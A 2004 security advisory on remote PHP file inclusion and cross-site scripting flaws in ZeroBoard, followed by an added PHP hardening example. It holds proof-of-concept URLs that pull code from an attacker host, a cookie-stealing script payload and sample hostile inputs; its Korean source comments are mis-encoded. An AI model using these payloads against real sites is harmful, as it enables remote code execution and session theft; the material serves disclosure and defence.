-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard

Revision 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by SSR Team ([EMAIL PROTECTED])

Summary
=======
ZeroBoard is a widely used web BBS application in Korea. However, an input validation flaw lets remote attackers run arbitrary commands with the privileges of the HTTPD process, which typically runs as the nobody user.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Impact
======
High: arbitrary command execution.

Affected Products
=================
ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED
========================
2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact, but they didn't reply.
2004-11-22 2nd vendor contact, but they didn't reply.
2004-12-13 STG Security, Inc. customers notified.
2004-12-24 Official release.

Details
=======
Vulnerability 1 : PHP source injection vulnerability
- ------------------------------------
- - Proof of concept
http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

- - Environment
PHP 5.0.x
php.ini : register_globals = On

- - Description
As of PHP 5.0.0, file_exists() can be used with URL wrappers, as explained at http://www.php.net/manual/en/function.file-exists.php. Thus the _zb_path parameter in outlogin.php can be easily exploited: the file_exists() check no longer rejects a remote path, so the include that follows it loads PHP source from the attacker's host.

- - Part of vulnerable source, outlogin.php.
- ----
// ìëëë ëëíë ìì ìí
if(!file_exists($_zb_path."lib.php")) {
    echo "ìëëë ëëíëê ìëëë";
    return;
}
// _head.php ìì
@include $_zb_path."_head.php";
}
- ----

Vulnerability 2 : PHP source injection vulnerability
- ------------------------------------
- - Proof of concept
http://[victim]/include/write.php?dir=http://[attacker]/

- - Environment
php.ini: register_globals = On

- - Reason
Uninitialized $dir variable in write.php

- - Part of vulnerable source, include/write.php
- ----
include $dir."/write.php";
- ----

Vulnerability 3 : Cross-site scripting vulnerability
- --------------------------------------
- - Proof of concept
http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</script>

- - Reason
check_user_id.php doesn't validate the input value of user_id.

- - Part of vulnerable source, check_user_id.php
- ----
$user_id = trim($user_id);
... ìë ...
if($check[0]) echo "$user_id ë ìë ëëë<br> ììëìëë";
else echo "$user_id ë ììíìì ììëë";
... ìë ...
- ----

Workaround
==========
Until official patches for these vulnerabilities are available, modify the vulnerable sources as recommended below.

Vulnerability 1: As of zboard 4.1pl4
- ----------------------------
Insert the following code at line 59 of outlogin.php:

if(eregi(":\/\/",$_zb_path)) $_zb_path="";

Vulnerability 2: As of zboard 4.1pl4
- ----------------------------
Insert the following code at line 15 of include/write.php:

if(eregi(":\/\/",$dir)) $dir="";

Vulnerability 3: As of zboard 4.1pl4
- ----------------------------
Insert the following code at line 3 of check_user_id.php:

$user_id = htmlspecialchars(trim($user_id));

Credits
=======
Jeremy Bae at STG Security

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQA/AwUBQctlEj9dVHd/hpsuEQJffgCg5fzqeXst5usCjWoK5fNV6lruGakAoJtM
awAFdddxTNRwEEy4vyUuxre9
=kiqS
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
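The workarounds in the advisory only reject strings containing "://", which stops the ftp:// and http:// proof-of-concept inputs but not a path prefix such as ../../ that points the include at another local directory, and eregi() itself was removed in PHP 7.0. The block below is an added example, written for this page and not ZeroBoard's code or the advisory author's patch; it assumes PHP 7.1 or later, and the names safe_board_path, html_escape and $board_root, together with the sample inputs, are illustrative. It shows the three hardened replacements side by side: resolve a caller-supplied prefix with realpath() and keep only directories contained in the board root (Vulnerability 1), give $dir a fixed value so register_globals cannot seed it (Vulnerability 2), and escape $user_id before echoing it (Vulnerability 3).

```php
<?php
// Added example, not ZeroBoard code. Hardened handling for the three inputs
// named in the advisory ($_zb_path, $dir, $user_id). Assumes PHP 7.1+;
// function names, $board_root and the sample inputs are illustrative.

/**
 * Return the resolved directory (with trailing separator) for a
 * caller-supplied path prefix, or null if it is not a real directory inside
 * $board_root. Rejects stream wrappers (ftp://, http://, php://, data:, ...)
 * and ../ traversal, which a "://" substring check alone does not stop.
 */
function safe_board_path(string $candidate, string $board_root): ?string
{
    // A scheme prefix means a stream wrapper, never a local directory.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return null;
    }
    $root = realpath($board_root);
    $real = realpath($board_root . '/' . $candidate);
    if ($root === false || $real === false || !is_dir($real)) {
        return null;
    }
    // Containment: the resolved path must be the root itself or sit below it.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($real !== $root && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real . DIRECTORY_SEPARATOR;
}

/** Escape user-controlled text before echoing it into an HTML page. */
function html_escape(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// How the vulnerable lines would change (illustration only, not executed here):
//   outlogin.php:       $_zb_path = safe_board_path($_GET['_zb_path'] ?? '.', $board_root);
//                       if ($_zb_path === null || !file_exists($_zb_path . 'lib.php')) { ...; return; }
//   include/write.php:  $dir = safe_board_path('.', $board_root);   // fixed, never from the request
//   check_user_id.php:  echo html_escape(trim($user_id)) . ' ...';

// Self-check with constructed inputs; $board_root is assumed to be this
// script's own directory.
$board_root = __DIR__;
$samples = [
    'ftp://attacker.example/pub/',   // wrapper, as in the advisory's PoC
    'http://attacker.example/',      // wrapper
    'php://input',                   // wrapper without a "//" host part
    'data:text/plain,x',             // wrapper that "://" matching misses
    '../../',                        // traversal outside the board root
    '.',                             // the only acceptable value here
];
foreach ($samples as $p) {
    printf("%-30s => %s\n", $p, safe_board_path($p, $board_root) ?? 'REJECTED');
}
echo html_escape('<script>alert(document.cookie)</script>'), "\n";
```

Run it with php from a directory that is not the filesystem root: every sample except "." is rejected, and the XSS payload comes back with its angle brackets and quotes encoded. The containment check compares against $root plus a separator so that a sibling directory whose name merely starts with the root's name is not accepted.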
